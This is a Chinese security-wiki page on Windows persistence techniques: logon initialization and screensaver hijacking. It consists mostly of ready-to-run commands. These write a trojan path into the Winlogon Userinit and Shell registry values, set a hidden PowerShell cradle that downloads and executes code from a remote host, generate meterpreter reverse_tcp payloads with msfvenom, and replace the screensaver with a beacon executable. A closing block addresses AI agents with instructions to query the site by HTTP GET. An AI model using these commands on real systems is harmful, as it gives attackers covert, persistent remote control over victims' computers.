# 登录初始化 **登录初始化** ``` 计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon下添加Userinit值 >Powershell.exe Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,c:\muma.exe" 计算机\HKEY_CURRENT_USER\Environment 创建键值UserInitMprLogonScript值为c:\muma.exe & Powershell实现: >Set-ExecutionPolicy RemoteSigned 保存ps1执行 Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c $w=new-object net.webclient;$w.proxy=[Net.WebRequest]::GetSystemWebProxy();$w.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $w.downloadstring('http://192.168.2.11:8080/kaMhC1');" # powershell反弹shell的payload参照msf中的web_delivery模块 >msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evilbinary.exe >msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evilbinary.dll >reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, evilbinary.exe" /f >reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, evilbinary.exe" /f >Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, evilbinary.exe" -Force >Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force ``` **屏幕保护程序** ``` 计算机\HKEY_CURRENT_USER\Control Panel\Desktop SCRNSAVE.EXE - 默认屏幕保护程序,改为恶意程序(设置备份) ScreenSaveActive - 1表示屏幕保护是启动状态,0表示表示屏幕保护是关闭状态 ScreenSaverTimeout - 指定屏幕保护程序启动前系统的空闲事件,单位为秒,默认为900(15分钟) >reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Users\hunter\Desktop\beacon.exe /f >reg add "hkcu\control panel\desktop" /v ScreenSaveActive /d 1 /f >reg add "hkcu\control panel\desktop" /v ScreenSaverIsSecure /d 0 /f >reg add "hkcu\control panel\desktop" /v ScreenSaveTimeOut /d 60 /f ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/quan-xian-wei-chi/windows/deng-lu-chu-shi-hua.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.